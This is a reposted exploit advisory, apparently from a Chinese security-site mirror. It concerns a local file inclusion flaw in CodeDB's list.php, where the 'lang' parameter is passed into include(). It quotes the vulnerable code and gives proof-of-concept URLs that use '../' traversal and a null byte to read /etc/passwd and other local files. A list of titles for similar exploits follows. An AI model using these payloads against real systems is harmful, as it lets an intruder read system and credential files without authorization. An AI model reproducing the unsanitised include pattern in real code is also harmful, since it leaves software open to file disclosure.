CodeDB (list.php lang) Local File Inclusion Vulnerability

所属分类：网络安全 / Exploit 阅读数： 124

收藏 0赞 0分享

###############################################################################
#
# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability
# Author : cOndemned
# Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*
#
###############################################################################

Source :

// list.php

2. $lang = htmlspecialchars($_GET['lang']); // ok, but.... for what ? lol

7. if(file_exists('templates/'.$lang.'_middle.php')) // We'll have to cut off rest of filename & extension
8. include('templates/'.$lang.'_middle.php'); // Ekhm... pwned ;d

Proof of Concept :

http://[host]/[codeDB_path]/list.php?lang=../readme.txt\0
http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd\0
http://[host]/[codeDB_path]/list.php?lang=../[local_file]\0

EoF.

更多精彩内容其他人还在看

CodeDB (list.php lang) Local File Inclusion Vulnerability

Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability

Galatolo Web Manager 1.3a

pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

Bilboblog 2.1 Multiple Remote Vulnerabilities

Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)

Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit

CodeDB (list.php lang) Local File Inclusion Vulnerability

MFORUM 0.1a Arbitrary Add-Admin Vulnerability

ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities

MS Windows (.doc File) Malformed Pointers Denial of Service Exploit

网络赚钱

站长故事